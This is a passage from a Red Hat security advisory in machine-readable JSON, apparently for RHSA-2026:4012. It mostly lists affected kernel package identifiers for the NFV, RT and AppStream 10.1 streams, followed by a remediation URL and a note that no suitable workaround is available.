"NFV-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-zfcpdump-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-core-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-devel-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-modules-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.src",
"RT-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-abi-stablelists-0:6.12.0-124.43.1.el10_1.noarch",
"RT-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debuginfo-common-aarch64-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debuginfo-common-ppc64le-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debuginfo-common-s390x-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debuginfo-common-x86_64-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-doc-0:6.12.0-124.43.1.el10_1.noarch",
"RT-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-zfcpdump-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-core-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-devel-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-modules-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.x86_64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:4012"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base, or stability.",
"product_ids": [
"AppStream-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.src",
"AppStream-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-abi-stablelists-0:6.12.0-124.43.1.el10_1.noarch",
"AppStream-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
